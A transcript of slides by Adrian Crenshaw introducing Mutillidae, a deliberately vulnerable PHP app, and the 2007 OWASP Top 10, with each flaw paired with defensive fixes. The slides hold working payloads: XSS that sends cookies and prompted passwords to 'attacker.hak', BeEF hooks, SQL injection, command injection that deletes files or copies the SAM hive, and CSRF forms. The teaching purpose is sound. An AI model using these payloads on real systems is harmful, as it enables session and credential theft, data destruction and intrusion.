Mutillidae and the OWASP Top 10 by Adrian Crenshaw aka Irongeek
-
Upload
magno-logan -
Category
Technology
-
view
362 -
download
0
description
Transcript of Mutillidae and the OWASP Top 10 by Adrian Crenshaw aka Irongeek
![Page 1: Mutillidae and the OWASP Top 10 by Adrian Crenshaw aka Irongeek](https://reader034.fdocuments.us/reader034/viewer/2022052412/55945a951a28ab4c728b4674/html5/thumbnails/1.jpg)
http://Irongeek.com
Adrian Crenshaw
![Page 2: Mutillidae and the OWASP Top 10 by Adrian Crenshaw aka Irongeek](https://reader034.fdocuments.us/reader034/viewer/2022052412/55945a951a28ab4c728b4674/html5/thumbnails/2.jpg)
http://Irongeek.com
I run Irongeek.com
I have an interest in InfoSeceducation
I don’t know everything - I’m just a geek with time on my hands
I’m also not a professional web developer, creating crappy code was easy or me.
So why listen to me? Sometimes it takes a noob to teach a noob.
![Page 3: Mutillidae and the OWASP Top 10 by Adrian Crenshaw aka Irongeek](https://reader034.fdocuments.us/reader034/viewer/2022052412/55945a951a28ab4c728b4674/html5/thumbnails/3.jpg)
http://Irongeek.com
OWASP Top 10http://www.owasp.org/index.php/OWASP_Top_Ten_Project(As a side note, I’ve copied quite of few of their descriptions and fixes into this presentation)
Mutillidaehttp://www.irongeek.com/i.php?page=security/mutillidae-deliberately-vulnerable-php-owasp-top-10
Ok, but what are those?
![Page 4: Mutillidae and the OWASP Top 10 by Adrian Crenshaw aka Irongeek](https://reader034.fdocuments.us/reader034/viewer/2022052412/55945a951a28ab4c728b4674/html5/thumbnails/4.jpg)
http://Irongeek.com
The 2007 list includes:
A1 - Cross Site Scripting (XSS)
A2 - Injection Flaws
A3 - Malicious File Execution
A4 - Insecure Direct Object Reference
A5 - Cross Site Request Forgery (CSRF)
A6 - Information Leakage and Improper Error Handling
A7 - Broken Authentication and Session Management
A8 - Insecure Cryptographic Storage
A9 - Insecure Communications
A10 - Failure to Restrict URL Access
The OWASP Top Ten represents a broad consensus about what the most critical
web application security flaws are.
![Page 5: Mutillidae and the OWASP Top 10 by Adrian Crenshaw aka Irongeek](https://reader034.fdocuments.us/reader034/viewer/2022052412/55945a951a28ab4c728b4674/html5/thumbnails/5.jpg)
http://Irongeek.com
A teaching tool for illustrating the OWASP 10
Written in PHP/MySQL
Meant to be simpler than WebGoat
Simple to exploit, just to get the concept across
Easy to reset
Includes a “Tips” function to help the student
![Page 6: Mutillidae and the OWASP Top 10 by Adrian Crenshaw aka Irongeek](https://reader034.fdocuments.us/reader034/viewer/2022052412/55945a951a28ab4c728b4674/html5/thumbnails/6.jpg)
http://Irongeek.com
1. Download Mutillidaehttp://www.irongeek.com/i.php?page=security/mutillidae-deliberately-vulnerable-php-owasp-top-10
2. Grab XAMPP Lite and install ithttp://www.apachefriends.org/en/xampp.html
3. Put the Mutillidae files in \htdocs
4. May want to edit xampplite\apache\conf\httpd.conf and set “Listen 127.0.0.1:80 “
![Page 7: Mutillidae and the OWASP Top 10 by Adrian Crenshaw aka Irongeek](https://reader034.fdocuments.us/reader034/viewer/2022052412/55945a951a28ab4c728b4674/html5/thumbnails/7.jpg)
http://Irongeek.com
XSS flaws occur whenever an
application takes user supplied data and
sends it to a web browser without first
validating or encoding that content. XSS
allows attackers to execute script in the
victim's browser which can hijack user
sessions, deface web sites, possibly
introduce worms, etc.
![Page 8: Mutillidae and the OWASP Top 10 by Adrian Crenshaw aka Irongeek](https://reader034.fdocuments.us/reader034/viewer/2022052412/55945a951a28ab4c728b4674/html5/thumbnails/8.jpg)
http://Irongeek.com
Simple:<script>alert("XSS");</script>
Page Redirect:<script>window.location = "http://www.irongeek.com/"</script>
Cookie Stealing:<script>new Image().src="http://attacker.hak/catch.php?cookie="+encodeURI(document.cookie);</script>
![Page 9: Mutillidae and the OWASP Top 10 by Adrian Crenshaw aka Irongeek](https://reader034.fdocuments.us/reader034/viewer/2022052412/55945a951a28ab4c728b4674/html5/thumbnails/9.jpg)
http://Irongeek.com
Simple:<script>alert("XSS");</script>
Page Redirect:<script>window.location = "http://www.irongeek.com/"</script>
Cookie Stealing:<script>new Image().src="http://attacker.hak/catch.php?cookie="+encodeURI(document.cookie);</script>
Password Con:<script>username=prompt('Please enter your username',' ');password=prompt('Please enter your password',' ');document.write("<imgsrc=\"http://attacker.hak/catch.php?username="+username+"&password="+password+"\">");</script>
![Page 10: Mutillidae and the OWASP Top 10 by Adrian Crenshaw aka Irongeek](https://reader034.fdocuments.us/reader034/viewer/2022052412/55945a951a28ab4c728b4674/html5/thumbnails/10.jpg)
http://Irongeek.com
External Javascript:<script src="http://ha.ckers.org/xss.js"></script>
Hot BeEF Injection:<script language='Javascript'src='http://localhost/beef/hook/beefmagic.js.php'></script>
How about the User Agent string?
![Page 11: Mutillidae and the OWASP Top 10 by Adrian Crenshaw aka Irongeek](https://reader034.fdocuments.us/reader034/viewer/2022052412/55945a951a28ab4c728b4674/html5/thumbnails/11.jpg)
http://Irongeek.com
Mangle XSS to bypass filters: http://ha.ckers.org/xss.html
BeEF browser exploitation frameworkhttp://www.bindshell.net/tools/beef
XSS Me Firefox pluginhttps://addons.mozilla.org/en-US/firefox/addon/7598
Exotic Injection Vectors http://www.irongeek.com/i.php?page=security/xss-sql-and-command-inject-vectors
![Page 12: Mutillidae and the OWASP Top 10 by Adrian Crenshaw aka Irongeek](https://reader034.fdocuments.us/reader034/viewer/2022052412/55945a951a28ab4c728b4674/html5/thumbnails/12.jpg)
http://Irongeek.com
Input validation.
Strong output encoding. htmlspecialchars()
Specify the output encoding.
Do not use "blacklist" validation to detect XSS in input or to encode output.
Watch out for canonicalization errors.
![Page 13: Mutillidae and the OWASP Top 10 by Adrian Crenshaw aka Irongeek](https://reader034.fdocuments.us/reader034/viewer/2022052412/55945a951a28ab4c728b4674/html5/thumbnails/13.jpg)
http://Irongeek.com
Injection flaws, particularly SQL
injection, are common in web applications.
Injection occurs when user-supplied data is
sent to an interpreter as part of a command
or query. The attacker's hostile data tricks
the interpreter into executing unintended
commands or changing data.
![Page 14: Mutillidae and the OWASP Top 10 by Adrian Crenshaw aka Irongeek](https://reader034.fdocuments.us/reader034/viewer/2022052412/55945a951a28ab4c728b4674/html5/thumbnails/14.jpg)
http://Irongeek.com
The Code:
“SELECT * FROM accounts WHERE username='". $username ."' AND password='".stripslashes($password).”’”
or
echo shell_exec("nslookup " . $targethost);'“
Expected to fill in the string to:
SELECT * FROM accounts WHERE username=‘adrian' AND password=‘somepassword’
or
Nslookup irongeek.com
But what if the person injected:
SELECT * FROM accounts WHERE username=‘adrian' AND password=‘somepassword’ or 1=1 -- ’
or
Nslookup irongeek.com && del *.*
![Page 15: Mutillidae and the OWASP Top 10 by Adrian Crenshaw aka Irongeek](https://reader034.fdocuments.us/reader034/viewer/2022052412/55945a951a28ab4c728b4674/html5/thumbnails/15.jpg)
http://Irongeek.com
Simple SQL Injection:' or 1=1 --
Wish I could do this, but can't stack in MySQL/PHP '; DROP TABLE owasp10; --
Command Injections:&& dir&& wmic process list&& wmic useraccount list&& copy c:\WINDOWS\repair\sam && copy c:\WINDOWS\repair\system.bak
(use ; as a separator if you are running this on Linux)
![Page 16: Mutillidae and the OWASP Top 10 by Adrian Crenshaw aka Irongeek](https://reader034.fdocuments.us/reader034/viewer/2022052412/55945a951a28ab4c728b4674/html5/thumbnails/16.jpg)
http://Irongeek.com
SQL Injection Cheat Sheethttp://ferruh.mavituna.com/sql-injection-cheatsheet-oku/
SQL Injection Attacks by Example http://unixwiz.net/techtips/sql-injection.html
Command line Kung Fuhttp://blog.commandlinekungfu.com/
![Page 17: Mutillidae and the OWASP Top 10 by Adrian Crenshaw aka Irongeek](https://reader034.fdocuments.us/reader034/viewer/2022052412/55945a951a28ab4c728b4674/html5/thumbnails/17.jpg)
http://Irongeek.com
Input validation.
Use strongly typed parameterized query APIs (bound parameters).
Enforce least privilege.
Avoid detailed error messages.
Show care when using stored procedures.
Do not use dynamic query interfaces.
Do not use simple escaping functions.
Watch out for canonicalization errors.
![Page 18: Mutillidae and the OWASP Top 10 by Adrian Crenshaw aka Irongeek](https://reader034.fdocuments.us/reader034/viewer/2022052412/55945a951a28ab4c728b4674/html5/thumbnails/18.jpg)
http://Irongeek.com
Code vulnerable to remote file
inclusion (RFI) allows attackers to include
hostile code and data, resulting in
devastating attacks, such as total server
compromise. Malicious file execution
attacks affect PHP, XML and any framework
which accepts filenames or files from users.
![Page 19: Mutillidae and the OWASP Top 10 by Adrian Crenshaw aka Irongeek](https://reader034.fdocuments.us/reader034/viewer/2022052412/55945a951a28ab4c728b4674/html5/thumbnails/19.jpg)
http://Irongeek.com
Grabbing a local file:http://target.hak/index.php?page=source-viewer.php&php_file_name=config.inc
Tamper Data, POST data and an inadvertent proxy
![Page 20: Mutillidae and the OWASP Top 10 by Adrian Crenshaw aka Irongeek](https://reader034.fdocuments.us/reader034/viewer/2022052412/55945a951a28ab4c728b4674/html5/thumbnails/20.jpg)
http://Irongeek.com
Tamper Data Firefox Pluginhttps://addons.mozilla.org/en-US/firefox/addon/966
Paroshttp://www.parosproxy.org/index.shtml
WebScarabhttp://www.owasp.org/index.php/Category:OWASP_WebScarab_Project
![Page 21: Mutillidae and the OWASP Top 10 by Adrian Crenshaw aka Irongeek](https://reader034.fdocuments.us/reader034/viewer/2022052412/55945a951a28ab4c728b4674/html5/thumbnails/21.jpg)
http://Irongeek.com
Strongly validate user input using "accept known good" as a strategy
Add firewall rules to prevent web servers making new connections to external web sites and internal systems.
Consider implementing a chroot jail or other sand box mechanisms.
# PHP: Disable allow_url_fopen and allow_url_include in php.ini and consider .building PHP locally to not include this functionality.
# PHP: Disable register_globals and use E_STRICT to find uninitialized variables.
# PHP: Ensure that all file and streams functions (stream_*) are carefully vetted.
![Page 22: Mutillidae and the OWASP Top 10 by Adrian Crenshaw aka Irongeek](https://reader034.fdocuments.us/reader034/viewer/2022052412/55945a951a28ab4c728b4674/html5/thumbnails/22.jpg)
http://Irongeek.com
A direct object reference occurs when
a developer exposes a reference to an
internal implementation object, such as a
file, directory, database record, or key, as a
URL or form parameter. Attackers can
manipulate those references to access
other objects without authorization.
![Page 23: Mutillidae and the OWASP Top 10 by Adrian Crenshaw aka Irongeek](https://reader034.fdocuments.us/reader034/viewer/2022052412/55945a951a28ab4c728b4674/html5/thumbnails/23.jpg)
http://Irongeek.com
You already saw it with the malicious file include demo.
![Page 24: Mutillidae and the OWASP Top 10 by Adrian Crenshaw aka Irongeek](https://reader034.fdocuments.us/reader034/viewer/2022052412/55945a951a28ab4c728b4674/html5/thumbnails/24.jpg)
http://Irongeek.com
Avoid exposing your private object references to users whenever possible, such as primary keys or filenames.
Validate any private object references extensively with an "accept known good" approach.
Verify authorization to all referenced objects.
![Page 25: Mutillidae and the OWASP Top 10 by Adrian Crenshaw aka Irongeek](https://reader034.fdocuments.us/reader034/viewer/2022052412/55945a951a28ab4c728b4674/html5/thumbnails/25.jpg)
http://Irongeek.com
A CSRF attack forces a logged-on
victim's browser to send a pre-authenticated
request to a vulnerable web application,
which then forces the victim's browser to
perform a hostile action to the benefit of the
attacker. CSRF can be as powerful as the
web application that it attacks.
![Page 26: Mutillidae and the OWASP Top 10 by Adrian Crenshaw aka Irongeek](https://reader034.fdocuments.us/reader034/viewer/2022052412/55945a951a28ab4c728b4674/html5/thumbnails/26.jpg)
http://Irongeek.com
Target Web App
Client
Website the
attacker controls
1. Session established
with web app via a
cookie. (already logged
in)
2. At some later point,
content that the
attacker controls is
requested.
3. Attacker serves up
content that asks
client’s browser to
make a request.
4. Client makes request,
and since it already has
a session cookie the
request is honored.
![Page 27: Mutillidae and the OWASP Top 10 by Adrian Crenshaw aka Irongeek](https://reader034.fdocuments.us/reader034/viewer/2022052412/55945a951a28ab4c728b4674/html5/thumbnails/27.jpg)
http://Irongeek.com
Let visit a page with this lovely link:<img src="http://target.hak/index.php?page=add-to-your-
blog.php&input_from_form=hi%20there%20monkeyboy">
Don’t want to use a bad image? Try an Iframe:<iframe src="http://target.hak/index.php?page=add-to-your-
blog.php&input_from_form=hi%20there%20monkeyboy"" style="width:0px; height:0px; border: 0px"></iframe>
Can’t use the GET method? Try something like:<html> <body><form name="csrfform" method="post" action="http://target.hak/index.php?page=add-to-your-blog.php"><input type='hidden' name='input_from_form' value="Test of of auto submitted form."></form><script>document.csrfform.submit()</script> </body></html>
![Page 28: Mutillidae and the OWASP Top 10 by Adrian Crenshaw aka Irongeek](https://reader034.fdocuments.us/reader034/viewer/2022052412/55945a951a28ab4c728b4674/html5/thumbnails/28.jpg)
http://Irongeek.com
CSRF Flaws Found On Major Websites, Including a Bank http://it.slashdot.org/article.pl?sid=08/09/30/0136219
CSRF Home Router Funhttp://www.gnucitizen.org/blog/persistent-xss-and-csrf-on-wireless-g-adsl-gateway-with-speedbooster-wag54gs/
CSRF in Gmailhttp://www.gnucitizen.org/blog/google-gmail-e-mail-hijack-technique/
![Page 29: Mutillidae and the OWASP Top 10 by Adrian Crenshaw aka Irongeek](https://reader034.fdocuments.us/reader034/viewer/2022052412/55945a951a28ab4c728b4674/html5/thumbnails/29.jpg)
http://Irongeek.com
For sensitive data or value transactions, re-authenticate or use transaction signing to ensure that the request is genuine.
Do not use GET requests (URLs) for sensitive data or to perform value transactions. (see next point)
POST alone is insufficient protection.
Consider adding Captchas and extra sessions values as hidden form elements.
![Page 30: Mutillidae and the OWASP Top 10 by Adrian Crenshaw aka Irongeek](https://reader034.fdocuments.us/reader034/viewer/2022052412/55945a951a28ab4c728b4674/html5/thumbnails/30.jpg)
http://Irongeek.com
Deliberately Insecure Web Applications For Learning Web App Security http://www.irongeek.com/i.php?page=security/deliberately-insecure-web-applications-for-learning-web-app-security
![Page 31: Mutillidae and the OWASP Top 10 by Adrian Crenshaw aka Irongeek](https://reader034.fdocuments.us/reader034/viewer/2022052412/55945a951a28ab4c728b4674/html5/thumbnails/31.jpg)
http://Irongeek.com
SamuraiWTFhttp://samurai.inguardians.com/
OWASP Live CDhttp://www.owasp.org/index.php/Category:OWASP_Live_CD_Project
BackTrackhttp://www.remote-exploit.org/backtrack.html
![Page 32: Mutillidae and the OWASP Top 10 by Adrian Crenshaw aka Irongeek](https://reader034.fdocuments.us/reader034/viewer/2022052412/55945a951a28ab4c728b4674/html5/thumbnails/32.jpg)
http://Irongeek.com
Free ISSA classes
ISSA Meetinghttp://issa-kentuckiana.org/
Louisville Infosechttp://www.louisvilleinfosec.com/
Phreaknic/Notacon/Outerz0nehttp://phreaknic.infohttp://notacon.org/http://www.outerz0ne.org/
![Page 33: Mutillidae and the OWASP Top 10 by Adrian Crenshaw aka Irongeek](https://reader034.fdocuments.us/reader034/viewer/2022052412/55945a951a28ab4c728b4674/html5/thumbnails/33.jpg)
http://Irongeek.com
42